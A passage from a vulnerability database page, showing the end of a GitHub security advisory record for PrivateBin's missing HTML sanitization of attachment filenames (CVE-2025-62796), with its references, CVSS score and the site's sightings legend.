like to thank everyone reporting issues and potential vulnerabilities to us.\n\nIf you think you have found a vulnerability or potential security risk, [we\u0027d kindly ask you to follow our security policy](https://github.com/PrivateBin/PrivateBin/blob/master/SECURITY.md) and report it to us. We then assess the report and will take the actions we deem necessary to address it.",
  "id": "GHSA-867c-p784-5q6g",
  "modified": "2025-10-29T14:48:58Z",
  "published": "2025-10-28T20:14:09Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/PrivateBin/PrivateBin/security/advisories/GHSA-867c-p784-5q6g"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62796"
    },
    {
      "type": "WEB",
      "url": "https://github.com/PrivateBin/PrivateBin/pull/1550"
    },
    {
      "type": "WEB",
      "url": "https://github.com/PrivateBin/PrivateBin/commit/c4f8482b3072be7ae012cace1b3f5658dcc3b42e"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/PrivateBin/PrivateBin"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "PrivateBin is missing HTML sanitization of attached filename in file size hint"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

CVE-2025-62796 (GCVE-0-2025-62796)

Vulnerability from cvelistv5

fkie_cve-2025-62796

Vulnerability from fkie_nvd

ghsa-867c-p784-5q6g

Vulnerability from github

Impact

Technical Description

Proof of concept

Reproduction Steps

Mitigation

Patches

References

More information

Credits

Tags

Sightings

Nomenclature